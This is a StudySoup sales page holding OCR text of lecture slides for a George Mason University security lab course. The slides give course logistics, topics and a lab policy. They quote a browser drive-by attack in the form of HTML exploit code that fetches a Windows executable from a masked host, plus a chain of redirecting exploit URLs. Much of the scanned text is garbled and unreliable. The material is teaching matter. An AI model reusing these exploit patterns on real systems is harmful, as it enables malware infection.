New User Special Price Expires in

Let's log you in.

Sign in with Facebook


Don't have a StudySoup account? Create one here!


Create a StudySoup account

Be part of our community, it's free to join!

Sign up with Facebook


Create your account
By creating an account you agree to StudySoup's terms and conditions and privacy policy

Already have a StudySoup account? Login here

Security Laboratory

by: Federico Kerluke

Security Laboratory ISA 564

Federico Kerluke
GPA 3.58

Angelos Stavrou

Almost Ready


These notes were just uploaded, and will be ready to view shortly.

Purchase these notes here, or revisit this page.

Either way, we'll remind you when they're ready :)

Preview These Notes for FREE

Get a free preview of these Notes, just enter your email below.

Unlock Preview
Unlock Preview

Preview these materials now for free

Why put in your email? Get access to more of this material and other relevant free materials for your school

View Preview

About this Document

Angelos Stavrou
Class Notes
25 ?




Popular in Course

Popular in Information Security Assurance

This 20 page Class Notes was uploaded by Federico Kerluke on Monday September 28, 2015. The Class Notes belongs to ISA 564 at George Mason University taught by Angelos Stavrou in Fall. Since its upload, it has received 26 views. For similar materials see /class/215090/isa-564-george-mason-university in Information Security Assurance at George Mason University.

Similar to ISA 564 at Mason

Popular in Information Security Assurance


Reviews for Security Laboratory


Report this Material


What is Karma?


Karma is the currency of StudySoup.

You can buy or earn more Karma at anytime and redeem it for class notes, study guides, flashcards, and more!

Date Created: 09/28/15
ISA 564 SECURITY LAB Class Mechanics Angelos Stavrou George Mason University Course Mechanics III Course URL httpz csgmuedu astavrou isa564 SO9html El Instructor Angelos Stavrou Email astavrougmuedu Of ce Science and Tech II 441 Of ce Phone 703 9931659 amp 3772 Of ce Hours Wednesday 330 430pm Wednesday 710 810pm and by appointment Course Mechanics 1 Course URL http csgmuedu astavr0u isa564 509html a TA Haris Andrianakis Email candriangmuedu Of ce Lab in STII460 Of ce Hours Thursday 500pm 700pm a TA Eunjung Yoon Email ey00n2gmuedu Of ce TA room in ST II 3rd oor Of ce Hours Monday 430pm 630pm Course Overview 5 Provide handson experience with commodity software and their vulnerabilities in a live laboratory environment 1 Experiment with Attacks against Networks and Machines El Defenses Forensics and diagnostics for security a Install and Test Defenses including Intrusion and anomaly detection Systems IDS 1 Examine the functionality of Botnets Malware anti virus anti spyware Prerequisites 1 Courses No I Skills Familiar or comfortable with Linux C and ASM knowledge is a plus Willingness to invest time in the lab learning about exploits defenses and tools Being able to install programs and work in unix and windows environment Course Topics tentative 1 Introduction Lab Environment be able to run experiments at home 1 Software Vulnerabilities What are the popular attack targets El Malware Design amp Economics How What Why a Network Attacks Wireless amp VoIP Effectiveness ease of deployment traceability Course Topics tentative El Defenses I Intrusion and Anomaly Detection Capabilities Ease of use Limitations El Defenses 11 Traf c Analysis amp Adaptive Firewalls Can we characterize traffic inside an organization a Defenses III Host based Defenses Hostbased Containment architectures Full Virtualization vs paraVirtualization vs Lightweight Process Containers D Other Hot Topics Emerging infection vectors Virtualization OpenVZ Linux Vservers Advanced malware eg rootkits botnets Course Grading Class Lab 1 M loit Lab 2 Malware amp Shellcode Lab 3 Network Attacks Lab 4 Traf c Analysis amp Intrusion Detection Lab 5 Hostbased Attack Containment Lab 6 XSS SQL Injection Attacks Defenses Team 34 Total Course Grading B Class Project What Project This is just a class Teams of 34 students working on the same topic Project Topics will be available online I You can also propose your own El Research Project El Study of an Existing System El Requirements Report at the end of the semester 30 In class Presentation 10 Students vote for the best and worst project III No actual coding is required Course Policies III Academic integrity Read the GMU honor code I want you to collaborate and ask questions however a Unless otherwise noted work turned in should re ect your independent capabilities If unsure note cite sources and help III Usually no late submissions will be accepted You will be given two weeks to submit your work No penalty for documented emergency e g medical or by prior arrangement in special circumstances Warning El Policy on security experiments you may not break into machines that are not your own you may not attempt to attack or subvert system security on machines not owned by you you can collaborate but not copy or outsource your work Class Survey III Introduce yourself Name Enrolled program I Your advisor if you are a PhD student Background I Programming in Linux I If a PhD student which year in the program Personal experience I Security Expected goal I Why you are interested in taking this course ISA 564 SECURITY LAB Introduction Angelos Stavrou George Mason University Motivation 1 Internet malware remains a top threat Ea Malware Virus worms motkits spyware bots eaRegister Biting the hand that feeds 1 war suhware Muslmmedlz Nemnrks Sunlrlly Puhlksemzr luslnus Sdence Oddshsads Am ID 5 3 Nut Emsvpnsekzunw Antlrvuus Sp 1cm 39n Canton m Nzwstumvs a reeds E em n mm mentnimn m I mp Emma MUST READ MOSTEDMMENTED IUS credit card payment house breached by snif ng matware I uspicious activity in the Heartland By mn a mill In San Functew Get more tram this author Pasted in Sammy zmn January 2009 1857 GMT Amencan Express amen ny xss hugs agatn Baf n brings 39wrlie ease run anywhere39tu ctsee nuaeks 5M5 hug Nukla39s Converszllnn guns mute Mast wmtenaper r The susness use cm Vmuahzalmn Heantena Payment Systems 2 payments proeeesur that serves more ma 250mm Us bu I e eed s n sees w r d mnsumers Tuesday that men card data may have been mm m lollcwmg a sscumy breach or the mmpany s payment system user wireless eavesamppvng made easy R55 WarluPay meaen exposes 15 mlmon Motivation Leewarrreanes warrermrerryeme da rk READ N 6 am mum rersymamee dark READING rmrmerrrsrmsymeree mm in a hamnuns Equot P 39 P39 quotquot emrmmeum 9 mm Enanolnwmennnn 110 39 39 Lrsmn Now 1 39 Lismrv Nww AnAcKs r rsme wanna were secumn umaususw noqu ssculln sucn HENRIquot MAMMEMENY sraRAaE sscunm iEmaillnispaan i vrirrrireraau nsuamakx r Dimammsmnu Iawvmwsm i neeewm r Slow And Silent Targeted Botnet Uses Inauguration To Attacks On The Rise F 39 users 39 to Targeted methodical attacks dif cult o dekec Downloadl quot9 Malware L wm mummy maerereaa Janus mg I m 29 PM Waiedac Trojan iurns PC into holnelznmbies mn cklr nawnadug researchers say ay Kelly Jackson Nl lnu Mum Jan 2a 2008 mam PM WEECAsYs Ciick asking and The mnsl aererrnrrrea wbemnmmals mm newssaniywmk lasx wner mey breach By Tim WILion ermer a nelwnrkr Hulli s Ws nrarrn Mew m wznrzuaa i w n u M Mixigaung RiskniiTVa axpans say rrrermarrarr seem Smashes me snr was Is a memudiml amok where me smoker covers ms mks as as penelrales r r a mmcsema 1 mm rrr r M rk Eriererrse mums Iale ansr me bad guys have mane an wmr valuanie Gala am done sannus damage securin expens say IT and secuMy 01 me iniammis Slam homei 1 used In be a 39smash arm gran where cnminais wnuid see whal my mum new ike Rumman serum vine mesmerr quotan I I ma uirmnai Obama has reused is as presidem Eamnk Onamas inaugurahun mar was I r m planquot an 20m January 2009 rs Lm er me urreai oHaiiuIefme srre says On Vquot WW 9 quot quot k quot quot39h me eve a inaugumunn Day Presidenbeiec Eamck Obama made a staiemem He deciared mai rre is demier NOT ready var Ims easmarr Maiysis say mat e mm me has arr m m N am mam Mama m mmm Types of Attacks El Browser and Binary Malware Viruses worms and troj an horses I Attacks by hijacking of authentication credentials 1 Browser Exploits III Denial of Service I Data Ex filtration 1 Email attacks 1 Active amp Passive Traf c Analysis III Voice over IP attacks El Wireless attacks El An Attack Incident Against IE Browser El One Click on a malicious URL http 39XXX 9X XX8 8XusersXXXXXXXIaXXz html CI Result lthtmlgtltheadgtlttitlegtlttitlegtltheadgt ltbodygt MSOSOOZ ltS V39egt 39 CURSOR urlquothttpvxxxxxxebizadverts033sploitanrquot ltstylegt ltAPPLET ARCHIVE39countjar39 CODE39BIackBoxclass39 WIDTH1 HEIGHT 1gt ltPARAM NAME39urI39 VALUE39httpvxxxxxxebizadverts033win32exe39gtlt MSO3Ol l APPLETgt ltscriptgt trv documentwrite39 ltobject data amp 109amp 115amp45amp 105amp 116amp 115amp58 1 amp 109amp 104amp 116amp 109amp 108amp 58amp 10 2amp 105amp 108amp 101amp58 Cfo3939omht3939httpvxxxx3939xxebizadv3939erts033targch39 39mtarg3939ethtm type textxscriptlet gtltob3939jectgt39 catche ltscriptgt lt Ihnrlvgtlt lhtmlgt Site nodes Content Provider Exploit Provider URLs Redirecting URL Exploiting URL URLlevel Topology Graph for WinXP SP1 Unpatched 688 URLs from 270 sites Motivation Example Third Party Code eg visit counter lt aegm Stat Basic code ltscxlpt lan uager JavaScriptquot 5rcquothttpm1statvxxbaslcqs39v ltscr1ptgtltscript langnag JavaScrlptquotgt lt statbasiCquotSTSBlCCLfUdmAHKtahSInbhtuowAquot o quotgt ltscr1ptgt ltnoscriptgt lt5 hre 7 httpVlstatxxstatsSTSBldmAI1Kthtwowkquotgt 39 d T thtwo39 quot18quotgtltagtltnascriptgt hctp xp1 inx e cgiibinisOSOS cgJVhomupage hccp sxpl 1nfodemophp 1 nf 5 httpexp 1 oc bLnJEOGDSCgl7tyP8M503YKRSPL nf 139 http explinfocgiibinieOSOScg1exploltMSOS11 http d35t 1ufofBJmslrfum 39ldhwinus exe Course Focus III Understanding essential techniques behind these attacks q ensively and defensively III Experiment with the tools existing malware and defensives 3 Learn how to use existing or write your own working code


Buy Material

Are you sure you want to buy this material for

25 Karma

Buy Material

BOOM! Enjoy Your Free Notes!

We've added these Notes to your profile, click here to view them now.


You're already Subscribed!

Looks like you've already subscribed to StudySoup, you won't need to purchase another subscription to get this material. To access this material simply click 'View Full Document'

Why people love StudySoup

Steve Martinelli UC Los Angeles

"There's no way I would have passed my Organic Chemistry class this semester without the notes and study guides I got from StudySoup."

Amaris Trozzo George Washington University

"I made $350 in just two days after posting my first study guide."

Jim McGreen Ohio University

"Knowing I can count on the Elite Notetaker in my class allows me to focus on what the professor is saying instead of just scribbling notes the whole time and falling behind."

Parker Thompson 500 Startups

"It's a great way for students to improve their educational experience and it seemed like a product that everybody wants, so all the people participating are winning."

Become an Elite Notetaker and start selling your notes online!

Refund Policy


All subscriptions to StudySoup are paid in full at the time of subscribing. To change your credit card information or to cancel your subscription, go to "Edit Settings". All credit card information will be available there. If you should decide to cancel your subscription, it will continue to be valid until the next payment period, as all payments for the current period were made in advance. For special circumstances, please email


StudySoup has more than 1 million course-specific study resources to help students study smarter. If you’re having trouble finding what you’re looking for, our customer support team can help you find what you need! Feel free to contact them here:

Recurring Subscriptions: If you have canceled your recurring subscription on the day of renewal and have not downloaded any documents, you may request a refund by submitting an email to

Satisfaction Guarantee: If you’re not satisfied with your subscription, you can contact us for further help. Contact must be made within 3 business days of your subscription purchase and your refund request will be subject for review.

Please Note: Refunds can never be provided more than 30 days after the initial purchase date regardless of your activity on the site.